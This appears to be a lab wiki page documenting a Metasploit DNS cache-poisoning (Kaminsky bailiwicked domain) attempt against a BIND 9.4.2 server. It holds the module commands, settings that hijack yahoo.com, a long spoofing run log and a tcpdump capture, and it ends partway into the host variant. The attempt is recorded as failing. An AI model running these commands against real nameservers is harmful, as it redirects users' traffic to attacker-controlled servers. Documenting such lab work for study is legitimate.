{{MSFlag}} | |||
Latest revision as of 09:43, 19 August 2016
Searching for Exploits
Searching for exploits of the DNS service that is running, ISC BIND 9.4.2, we find the following exploit: https://www.exploit-db.com/exploits/6122/
This exploit is labeled auxiliary/spoof/dns/bailiwicked_domain. It allows us to insert malicious DNS records into the DNS server.
DNS Exploit: bailiwicked domain
In plain English, this attack allows you to add your own DNS entries to a target DNS nameserver. Thus, you could create a DNS entry like somethingveryevil.microsoft.com that would direct visitors wherever you wish.
We can use this exploit by running:
msf > use auxiliary/spoof/dns/bailiwicked_domain
More information:
This exploit targets a fairly ubiquitous flaw in DNS implementations which allow the insertion of malicious DNS records into the cache of the target nameserver. This exploit caches a single malicious nameserver entry into the target nameserver which replaces the legitimate nameservers for the target domain. By causing the target nameserver to query for random hostnames at the target domain, the attacker can spoof a response to the target server including an answer for the query, an authority server record, and an additional record for that server, causing target nameserver to insert the additional record into the cache. This insertion completely replaces the original nameserver records for the target domain.
To interpret:
- Metasploit induces the target nameserver to ask for information from a target domain. It then gathers information about the responses to craft its attack.
- Metasploit then induces the target nameserver to ask for random subdomains at the target domain, and sends fake responses from the target domain back to the target nameserver in an attempt to confuse the target nameserver.
- When the attack/spoofing is successful, the target nameserver will receive a new authority server record (faked by Metasploit), and will insert this new record into its DNS cache.
- This means the target nameserver has a new DNS record for the target domain, containing whatever DNS servers were set in the Metasploit attack.
- Now, anyone requesting the target domain from the target nameserver will actually be routed to your (malicious) nameserver, where you can tamper with the request before forwarding it along.
Setting up bailiwicked domain attack
We can set up the attack by setting the remote host and the various options through Metasploit.
Start by loading the exploit and showing the available options:
msf > use auxiliary/spoof/dns/bailiwicked_domain msf auxiliary(bailiwicked_domain) > show options Module options (auxiliary/spoof/dns/bailiwicked_domain): Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN example.com yes The domain to hijack INTERFACE no The name of the interface NEWDNS yes The hostname of the replacement DNS server RECONS 208.67.222.222 yes The nameserver used for reconnaissance RHOST yes The target address SNAPLEN 65535 yes The number of bytes to capture SRCADDR Real yes The source address to use for sending the queries (Accepted: Real, Random) SRCPORT yes The target server's source query port (0 for automatic) TIMEOUT 500 yes The number of seconds to wait for new data TTL 33918 yes The TTL for the malicious host entry XIDS 0 yes The number of XIDs to try for each query (0 for automatic) msf auxiliary(bailiwicked_domain) >
The default recons dns server is an OpenDNS server: http://whatismyipaddress.com/ip/208.67.222.222
msf auxiliary(bailiwicked_domain) > set DOMAIN yahoo.com DOMAIN => yahoo.com msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com NEWDNS => dns01.metasploit.com msf auxiliary(bailiwicked_domain) > set RHOST 10.0.0.27 RHOST => 10.0.0.27 msf auxiliary(bailiwicked_domain) > set SRCPORT 0 SRCPORT => 0 msf auxiliary(bailiwicked_domain) >
Locked and loaded.
Here's the before:
msf auxiliary(bailiwicked_domain) > dig +short -t ns yahoo.com @10.0.0.27 [*] exec: dig +short -t ns yahoo.com @10.0.0.27 ns6.yahoo.com. ns1.yahoo.com. ns4.yahoo.com. ns5.yahoo.com. ns2.yahoo.com. ns3.yahoo.com. msf auxiliary(bailiwicked_domain) >
Let's rock.
Check bailiwicked domain attack
Normally, you should be able to run check to check everything and make sure it will run ok. This fails:
msf > use auxiliary/spoof/dns/bailiwicked_domain msf auxiliary(bailiwicked_domain) > set RHOST 10.0.0.27 RHOST => 10.0.0.27 msf auxiliary(bailiwicked_domain) > set SRCPORT 0 SRCPORT => 0 msf auxiliary(bailiwicked_domain) > set NEWDNS 8.8.8.8 NEWDNS => 8.8.8.8 msf auxiliary(bailiwicked_domain) > check [*] 10.0.0.27 - Cannot reliably check exploitability. msf auxiliary(bailiwicked_domain) >
Not sure why.
Attack failure
The attack fails. The DNS poisoning attempts continue indefinitely, but never finish. The output below took around 2 hours to generate.
msf auxiliary(bailiwicked_domain) > run [*] Targeting nameserver 10.0.0.27 for injection of yahoo.com. nameservers as dns01.metasploit.com [*] Querying recon nameserver for yahoo.com.'s nameservers... [*] Got an NS record: yahoo.com. 42580 IN NS ns1.yahoo.com. [*] Querying recon nameserver for address of ns1.yahoo.com.... [*] Got an A record: ns1.yahoo.com. 304097 IN A 68.180.131.16 [*] Checking Authoritativeness: Querying 68.180.131.16 for yahoo.com.... [*] ns1.yahoo.com. is authoritative for yahoo.com., adding to list of nameservers to spoof as [*] Got an NS record: yahoo.com. 42580 IN NS ns2.yahoo.com. [*] Querying recon nameserver for address of ns2.yahoo.com.... [*] Got an A record: ns2.yahoo.com. 467535 IN A 68.142.255.16 [*] Checking Authoritativeness: Querying 68.142.255.16 for yahoo.com.... [*] ns2.yahoo.com. is authoritative for yahoo.com., adding to list of nameservers to spoof as [*] Got an NS record: yahoo.com. 42580 IN NS ns5.yahoo.com. [*] Querying recon nameserver for address of ns5.yahoo.com.... [*] Got an A record: ns5.yahoo.com. 313840 IN A 119.160.247.124 [*] Checking Authoritativeness: Querying 119.160.247.124 for yahoo.com.... [*] ns5.yahoo.com. is authoritative for yahoo.com., adding to list of nameservers to spoof as [*] Got an NS record: yahoo.com. 42580 IN NS ns3.yahoo.com. [*] Querying recon nameserver for address of ns3.yahoo.com.... [*] Got an A record: ns3.yahoo.com. 604800 IN A 203.84.221.53 [*] Checking Authoritativeness: Querying 203.84.221.53 for yahoo.com.... [*] ns3.yahoo.com. is authoritative for yahoo.com., adding to list of nameservers to spoof as [*] Got an NS record: yahoo.com. 42580 IN NS ns6.yahoo.com. [*] Querying recon nameserver for address of ns6.yahoo.com.... [*] Got an A record: ns6.yahoo.com. 127760 IN A 121.101.144.139 [*] Checking Authoritativeness: Querying 121.101.144.139 for yahoo.com.... [*] ns6.yahoo.com. is authoritative for yahoo.com., adding to list of nameservers to spoof as [*] Got an NS record: yahoo.com. 42580 IN NS ns4.yahoo.com. [*] Querying recon nameserver for address of ns4.yahoo.com.... [*] Got an A record: ns4.yahoo.com. 300799 IN A 98.138.11.157 [*] Checking Authoritativeness: Querying 98.138.11.157 for yahoo.com.... [*] ns4.yahoo.com. is authoritative for yahoo.com., adding to list of nameservers to spoof as [*] Calculating the number of spoofed replies to send per query... [*] race calc: 100 queries | min/max/avg time: 0.01/0.78/0.16 | min/max/avg replies: 4/950/133 [*] Sending 33 spoofed replies from each nameserver (6) for each query [*] Attempting to inject poison records for yahoo.com.'s nameservers into 10.0.0.27:0... [*] Sent 1000 queries and 198000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.78/0.22 | min/max/avg replies: 10/688/186 [*] Now sending 46 spoofed replies from each nameserver (6) for each query [*] Sent 2000 queries and 474000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.61/0.16 | min/max/avg replies: 2/526/131 [*] Now sending 32 spoofed replies from each nameserver (6) for each query [*] Sent 3000 queries and 666000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.76/0.14 | min/max/avg replies: 10/889/128 [*] Now sending 32 spoofed replies from each nameserver (6) for each query [*] Sent 4000 queries and 858000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.77/0.17 | min/max/avg replies: 10/581/139 [*] Now sending 34 spoofed replies from each nameserver (6) for each query [*] Sent 5000 queries and 1062000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.73/0.14 | min/max/avg replies: 14/636/116 [*] Now sending 29 spoofed replies from each nameserver (6) for each query [*] Sent 6000 queries and 1236000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.7/0.16 | min/max/avg replies: 8/602/137 [*] Now sending 34 spoofed replies from each nameserver (6) for each query [*] Sent 7000 queries and 1440000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.67/0.16 | min/max/avg replies: 9/579/129 [*] Now sending 32 spoofed replies from each nameserver (6) for each query [*] Sent 8000 queries and 1632000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.68/0.14 | min/max/avg replies: 12/592/115 [*] Now sending 28 spoofed replies from each nameserver (6) for each query [*] Sent 9000 queries and 1800000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/1.18/0.21 | min/max/avg replies: 14/1039/186 [*] Now sending 46 spoofed replies from each nameserver (6) for each query [*] Sent 10000 queries and 2076000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.57/0.15 | min/max/avg replies: 6/448/124 [*] Now sending 31 spoofed replies from each nameserver (6) for each query [*] Sent 11000 queries and 2262000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.73/0.18 | min/max/avg replies: 12/876/176 [*] Now sending 44 spoofed replies from each nameserver (6) for each query [*] Sent 12000 queries and 2526000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.67/0.17 | min/max/avg replies: 8/508/141 [*] Now sending 35 spoofed replies from each nameserver (6) for each query [*] Sent 13000 queries and 2736000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.02/0.7/0.14 | min/max/avg replies: 11/726/123 [*] Now sending 30 spoofed replies from each nameserver (6) for each query [*] Sent 14000 queries and 2916000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/1.19/0.16 | min/max/avg replies: 14/823/125 [*] Now sending 31 spoofed replies from each nameserver (6) for each query [*] Sent 15000 queries and 3102000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/1.1/0.15 | min/max/avg replies: 8/634/97 [*] Now sending 24 spoofed replies from each nameserver (6) for each query [*] Sent 16000 queries and 3246000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.13 | min/max/avg replies: 7/408/77 [*] Now sending 19 spoofed replies from each nameserver (6) for each query [*] Sent 17000 queries and 3360000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/10.24/0.65 | min/max/avg replies: 9/17339/883 [*] Now sending 220 spoofed replies from each nameserver (6) for each query [*] Sent 18000 queries and 4680000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.77/0.13 | min/max/avg replies: 5/900/105 [*] Now sending 26 spoofed replies from each nameserver (6) for each query [*] Sent 19000 queries and 4836000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.02/0.67/0.19 | min/max/avg replies: 17/351/114 [*] Now sending 28 spoofed replies from each nameserver (6) for each query [*] Sent 20000 queries and 5004000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.03/1.36/0.2 | min/max/avg replies: 15/1161/116 [*] Now sending 29 spoofed replies from each nameserver (6) for each query [*] Sent 21000 queries and 5178000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/1.32/0.19 | min/max/avg replies: 9/1391/137 [*] Now sending 34 spoofed replies from each nameserver (6) for each query [*] Sent 22000 queries and 5382000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.81/0.21 | min/max/avg replies: 8/1189/157 [*] Now sending 39 spoofed replies from each nameserver (6) for each query [*] Sent 23000 queries and 5616000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.73/0.17 | min/max/avg replies: 10/775/126 [*] Now sending 31 spoofed replies from each nameserver (6) for each query [*] Sent 24000 queries and 5802000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/1.22/0.16 | min/max/avg replies: 5/1046/115 [*] Now sending 28 spoofed replies from each nameserver (6) for each query [*] Sent 25000 queries and 5970000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.77/0.16 | min/max/avg replies: 10/894/120 [*] Now sending 30 spoofed replies from each nameserver (6) for each query [*] Sent 26000 queries and 6150000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.02/0.76/0.18 | min/max/avg replies: 6/969/161 [*] Now sending 40 spoofed replies from each nameserver (6) for each query [*] Sent 27000 queries and 6390000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.75/0.19 | min/max/avg replies: 12/667/124 [*] Now sending 31 spoofed replies from each nameserver (6) for each query [*] Sent 28000 queries and 6576000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.7/0.18 | min/max/avg replies: 8/776/127 [*] Now sending 31 spoofed replies from each nameserver (6) for each query [*] Sent 29000 queries and 6762000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.77/0.16 | min/max/avg replies: 9/589/107 [*] Now sending 26 spoofed replies from each nameserver (6) for each query [*] Sent 30000 queries and 6918000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.12 | min/max/avg replies: 9/837/91 [*] Now sending 22 spoofed replies from each nameserver (6) for each query [*] Sent 31000 queries and 7050000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.02/1.1/0.18 | min/max/avg replies: 15/1410/161 [*] Now sending 40 spoofed replies from each nameserver (6) for each query [*] Sent 32000 queries and 7290000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.72/0.15 | min/max/avg replies: 3/550/96 [*] Now sending 24 spoofed replies from each nameserver (6) for each query [*] Sent 33000 queries and 7434000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.67/0.14 | min/max/avg replies: 7/743/96 [*] Now sending 24 spoofed replies from each nameserver (6) for each query [*] Sent 34000 queries and 7578000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/1.08/0.18 | min/max/avg replies: 7/810/136 [*] Now sending 34 spoofed replies from each nameserver (6) for each query [*] Sent 35000 queries and 7782000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.67/0.18 | min/max/avg replies: 7/436/114 [*] Now sending 28 spoofed replies from each nameserver (6) for each query [*] Sent 36000 queries and 7950000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.06/1.07/0.17 | min/max/avg replies: 39/596/107 [*] Now sending 26 spoofed replies from each nameserver (6) for each query [*] Sent 37000 queries and 8106000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.78/0.19 | min/max/avg replies: 10/668/138 [*] Now sending 34 spoofed replies from each nameserver (6) for each query [*] Sent 38000 queries and 8310000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.14 | min/max/avg replies: 8/425/87 [*] Now sending 21 spoofed replies from each nameserver (6) for each query [*] Sent 39000 queries and 8436000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.77/0.21 | min/max/avg replies: 10/463/131 [*] Now sending 32 spoofed replies from each nameserver (6) for each query [*] Sent 40000 queries and 8628000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.17 | min/max/avg replies: 9/443/107 [*] Now sending 26 spoofed replies from each nameserver (6) for each query [*] Sent 41000 queries and 8784000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.02/0.6/0.14 | min/max/avg replies: 9/380/82 [*] Now sending 20 spoofed replies from each nameserver (6) for each query [*] Sent 42000 queries and 8904000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.16 | min/max/avg replies: 11/433/95 [*] Now sending 23 spoofed replies from each nameserver (6) for each query [*] Sent 43000 queries and 9042000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.7/0.19 | min/max/avg replies: 9/431/116 [*] Now sending 29 spoofed replies from each nameserver (6) for each query [*] Sent 44000 queries and 9216000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.16 | min/max/avg replies: 8/869/117 [*] Now sending 29 spoofed replies from each nameserver (6) for each query [*] Sent 45000 queries and 9390000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/1.18/0.16 | min/max/avg replies: 9/712/99 [*] Now sending 24 spoofed replies from each nameserver (6) for each query [*] Sent 46000 queries and 9534000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.2 | min/max/avg replies: 10/434/123 [*] Now sending 30 spoofed replies from each nameserver (6) for each query [*] Sent 47000 queries and 9714000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/1.08/0.2 | min/max/avg replies: 1/922/141 [*] Now sending 35 spoofed replies from each nameserver (6) for each query [*] Sent 48000 queries and 9924000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.15 | min/max/avg replies: 11/413/94 [*] Now sending 23 spoofed replies from each nameserver (6) for each query [*] Sent 49000 queries and 10062000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/1.12/0.19 | min/max/avg replies: 7/1025/108 [*] Now sending 27 spoofed replies from each nameserver (6) for each query [*] Sent 50000 queries and 10224000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.72/0.14 | min/max/avg replies: 9/651/92 [*] Now sending 23 spoofed replies from each nameserver (6) for each query [*] Sent 51000 queries and 10362000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.02/1.17/0.18 | min/max/avg replies: 7/647/97 [*] Now sending 24 spoofed replies from each nameserver (6) for each query [*] Sent 52000 queries and 10506000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.08/1.19/0.23 | min/max/avg replies: 29/1296/153 [*] Now sending 38 spoofed replies from each nameserver (6) for each query [*] Sent 53000 queries and 10734000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.13 | min/max/avg replies: 2/420/87 [*] Now sending 21 spoofed replies from each nameserver (6) for each query [*] Sent 54000 queries and 10860000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/1.18/0.15 | min/max/avg replies: 9/813/102 [*] Now sending 25 spoofed replies from each nameserver (6) for each query [*] Sent 55000 queries and 11010000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.06/0.59/0.11 | min/max/avg replies: 39/365/70 [*] Now sending 17 spoofed replies from each nameserver (6) for each query [*] Sent 56000 queries and 11112000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/1.19/0.14 | min/max/avg replies: 11/687/91 [*] Now sending 22 spoofed replies from each nameserver (6) for each query [*] Sent 57000 queries and 11244000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/1.18/0.21 | min/max/avg replies: 9/776/139 [*] Now sending 34 spoofed replies from each nameserver (6) for each query [*] Sent 58000 queries and 11448000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.15 | min/max/avg replies: 10/725/110 [*] Now sending 27 spoofed replies from each nameserver (6) for each query [*] Sent 59000 queries and 11610000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.67/0.17 | min/max/avg replies: 3/449/105 [*] Now sending 26 spoofed replies from each nameserver (6) for each query [*] Sent 60000 queries and 11766000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.19 | min/max/avg replies: 11/480/128 [*] Now sending 32 spoofed replies from each nameserver (6) for each query |
Tcpdump during bailiwicked domain attack
If you monitor your network interface in another window with tcpdump, you'll see this creates a HUGE amount of DNS packet traffic.
On a low-traffic server, this will cause a noticeable spike in traffic, and probably raise some eyebrows and get the IT crew on your case. The traffic graph shown below shows the traffic spike that the target domain (example.com, or yahoo.com, or whatever you pick) sees. The blue spike is incoming traffic, and is caused by this DNS bind attack:
THIS ATTACK IS NOT SUBTLE.
# tcpdump -i eth0 [...] 23:55:27.992636 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108) 23:55:27.993049 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108) 23:55:27.993480 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108) 23:55:27.993894 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108) 23:55:27.994786 IP morpheus.48140 > 10.0.0.27.domain: 38614+ A? pnJt2DO12GBApJy9.yahoo.com. (44) 23:55:27.995487 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107) 23:55:27.995909 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107) 23:55:27.996341 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107) 23:55:27.996721 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2421896:2426028, ack 1513, win 46, options [nop,nop,TS val 64578981 ecr 902386742], length 4132 23:55:27.996786 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2426028:2430160, ack 1513, win 46, options [nop,nop,TS val 64578981 ecr 902386742], length 4132 23:55:27.996962 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107) 23:55:27.997090 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2430160:2434292, ack 1513, win 46, options [nop,nop,TS val 64578981 ecr 902386742], length 4132 23:55:27.997216 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2434292:2438424, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 4132 23:55:27.997507 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2438424:2442556, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 4132 23:55:27.997642 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107) 23:55:27.997760 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2442556:2446688, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 4132 23:55:27.997929 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2446688:2454952, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 8264 23:55:27.998195 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107) 23:55:28.000837 IP morpheus.ssh > 10.0.0.19.62248: Flags [.], seq 2454952:2472328, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387138], length 17376 23:55:28.000880 IP morpheus.ssh > 10.0.0.19.62248: Flags [.], seq 2472328:2492600, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387138], length 20272 23:55:28.000921 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2492600:2508844, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387138], length 16244 23:55:28.001045 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2508844:2509476, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387139], length 632 23:55:28.001580 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107) 23:55:28.002006 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107) 23:55:28.002424 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107) 23:55:28.002846 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107) 23:55:28.003133 IP morpheus.ssh > 10.0.0.19.62248: Flags [.], ack 1549, win 46, options [nop,nop,TS val 64578983 ecr 902387140], length 0 [...] 23:55:28.366030 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110) 23:55:28.366489 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110) 23:55:28.366923 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110) 23:55:28.367362 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110) 23:55:28.367799 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110) 23:55:28.368372 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110) 23:55:28.368807 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110) 23:55:28.369263 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110) 23:55:28.369698 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110) 23:55:28.370140 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110) 23:55:28.370571 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110) 23:55:28.371137 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110) 23:55:28.371576 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110) 23:55:28.372018 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110) 23:55:28.372453 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110) 23:55:28.372889 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110) 23:55:28.373348 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110) 23:55:28.374282 IP morpheus.19248 > 10.0.0.27.domain: 32177+ A? oTdkBDSfM4iZG6.yahoo.com. (42) 23:55:28.375022 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105) 23:55:28.375462 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105) 23:55:28.375897 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105) 23:55:28.376339 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105) 23:55:28.376772 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105) 23:55:28.377226 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105) 23:55:28.377782 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (105) 23:55:28.378224 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (105)
Conclusions?
Reasons for failure are unclear at this point.
DNS Exploit: bailiwicked host
In plain English, this attack allows you to add your own host entry to a DNS nameserver's list of hostnames. This is done by confusing the nameserver by sending responses to fake DNS queries.
We can use this exploit by running:
msf > use auxiliary/spoof/dns/bailiwicked_host
More information:
This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single malicious host entry into the target nameserver by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and due to the additional hostname entry being within bailiwick constraints of the original request the malicious host entry will get cached.
Setting options for bailiwicked host exploit
Here are the options, after setting some things:
msf > show info
Name: DNS BailiWicked Host Attack
